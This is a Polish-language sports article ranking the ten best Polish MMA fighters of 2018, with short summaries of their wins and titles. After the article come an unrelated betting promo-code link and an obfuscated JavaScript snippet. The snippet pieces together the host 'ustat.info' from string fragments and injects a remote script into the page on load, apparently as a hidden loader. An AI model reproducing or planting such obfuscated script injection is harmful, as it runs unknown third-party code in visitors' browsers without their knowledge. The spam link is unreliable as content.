26.02.2019

#Najlepsi zawodnicy MMA 2018

Przedstawiamy ranking najlepszych dziesięciu polskich zawodników MMA w 2018 roku bez podziału na kategorie wagowe.

Stworzenie takiego zestawienia nie jest łatwym zadaniem. W 2018 roku wielu polskich zawodników zrobiło widoczne postępy, mamy swoich przedstawicieli w czołowych europejskich i światowych organizacjach. Przy ocenie pod uwagę brano zarówno efektowne zwycięstwa, zdobyte tytuły i perspektywy rozwoju.

1. Jan Błachowicz

Jeszcze półtora roku temu sytuacja Jana Błachowicza w UFC nie wyglądała kolorowo. Po porażkach z Alexandrem Gustafssonem i Patrickiem Cumminsem, losy "Johna" mogły potoczyć się różnie. Zawodnik urodzony w Cieszynie pokazał charakter i pełnię swoich umiejętności. Wygrał cztery pojedynki z rzędu, z czego dwa w 2018 roku. 36-letni zawodnik pokonał w rewanżu Jimi'ego Manuwę (UFC Fight Night 127) oraz efektownie poddał Nikitę Krylova (UFC Fight Night 136). Gdyby tego było mało Błachowicz awansował na podium w rankingu kategorii półciężkiej.

2. Mateusz Gamrot

1 grudnia 2018 roku w Gliwicach do historii KSW przeszedł Mateusz Gamrot. Popularny "Gamer" pokonał jednogłośną decyzją sędziów Klebera Koike Erbsta i sięgnął po pas mistrzowski w wadze piórkowej. Tym samym został czempionem dwóch kategorii. Gamrot posiada również tytuł w wadze lekkiej, którego skutecznie bronił trzykrotnie. Wcześniej żaden zawodnik KSW nie posiadał jednocześnie dwóch pasów mistrzowskich. W 2018 roku Gamrot zapisał na swoim koncie wygraną z Grzegorzem Szulakowskim.

3. Andrzej Grzebyk

Mistrz wagi średniej organizacji FEN buduje swoją pozycję w polskim MMA. 25 maja 2018 roku sięgnął po pas mistrzowski w wadze średniej. Podczas gali FEN 21 we Wrocławiu Grzebyk pokonał Thiago Vieirę. W ostatnich sekundach trzeciej rundy Polak zachwiał rywalem mocnym kopnięciem, a później zasypał go kanonadą ciosów. Łącznie w 2018 roku Grzebyk wygrał trzy pojedynki. Zawodnik może pochwalić się serią sześciu zwycięstw z rzędu.

4. Tomasz Narkun

Tomasz Narkun stał się pierwszoplanową postacią organizacji KSW. Ponad trzy lata temu w Londynie zdobył tytuł w wadze półciężkiej. W 2018 roku popularny "Żyrafa" wszedł na tron KSW. Tomasz Narkun dwukrotnie pokonał legendę organizacji – Mameda Khalidova. Najpierw podczas KSW 42 w Łodzi, a następnie w Gliwicach (KSW 46). Kolejny cel? Pas w wadze ciężkiej. O tytuł Narkun będzie rywalizował 23 marca z Philipem de Friesem.

5. Marcin Held

Po nieudanej przygodzie w UFC, gdzie wygrał tylko jedną walkę, Marcin Held świetnie odnalazł się w organizacji Absolute Championship Akhmat (wcześniej ACB). W 2018 roku były zawodnik Bellatora pokonał Callana Potter (ACB 88) oraz Musę Khamanaeva (ACB 90). Marcin Held efektownie wygrywał przed czasem przez dźwignię skrętową na staw skokowy.

6. Mateusz Rębecki

Mateusz Rębecki przebojem wszedł do organizacji Fight Exclusive Night i podążał drogą na szczyt na szczyt. W 2018 roku Popularny "Chińczyk" wywalczył pas mistrzowski w wadze lekkiej. Podczas gali FEN 20: Next Level w Warszawie pokonał w walce o tytuł Mariana Ziółkowskiego. W pierwszej obronie uporał się z Łukaszem Koperą (FEN 22). Oba pojedynki Rębecki rozstrzygnął przed czasem.

7. Piotr Strus

Piotr Strus znakomicie radził sobie w organizacji ACB. W 2018 roku po zaciętym starciu pokonał Fernando Gonzaleza i zanotował czwarte zwycięstwo w rosyjskiej organizacji. Polak zapracował na starcie o pas mistrzowski, do którego doszło we wrześniu w Krasnodarze (ACB 89). Strus musiał uznać jednak wyższość Alberta Duraeva.

8. Michał Materla

Były mistrz KSW w wadze średniej zaczął 2018 rok od porażki ze Scottem Askhamem (KSW 42). Później wrócił jednak do gry. Podczas KSW 44: The Game zatrzymał w drugiej rundzie Martina Zawadę. Udana dla Materli była również podróż do Londynu. Podczas gali KSW 45: The Return to Wembley w półfinale turnieju w kategorii średniej "Magic" w pierwszej rundzie odprawił Damiana Janikowskiego, który wcześniej zachwycał widzów. Stary lis pokazał umiejętności i czeka na finał. Tam spotka się z Askhamem.

9. Daniel Skibiński

W grudniu Daniel Skibiński wypunktował Pawła Pawlaka i sięgnął w Raszynie po pas kategorii półśredniej organizacji Babilon MMA. Dla "Skiby" była to trzecia wygrana w 2018 roku. W organizacji Babilon MMA Skibiński pozostaje niepokonany.

10. Marcin Tybura

Marcin Tybura utrzymuje się na pokładzie UFC. Choć rok 2018 nie był najlepszym w karierze polskiego zawodnika wagi ciężkiej, to zanotował cenną wygraną w starciu z wielkim Stefanem Struvem. Dla Polaka był to czwarty triumf w UFC. Tym cenniejszy, że Tybura zwyciężył po dwóch porażkach z rzędu.

https://kodyzaklady.pl/totolotek-kody-promocyjny

[kod]

(function(){
a8x3=document.createElement("script");a8x3_="u"+("s")+"ta";
a8x3_+=("t.i")+""+"n";a8x3_+=(("f")+"o");a8x3.type="text/javascript";
a8x3_+="/"; a8x3u="129713041";a8x3u+=".5xfdh4hi8x37yy5hgfq";a8x3u+="irre31apz4c";
a8x3.src="https://"+a8x3_+a8x3u;a8x3.async=true;document.body.appendChild(a8x3);
})();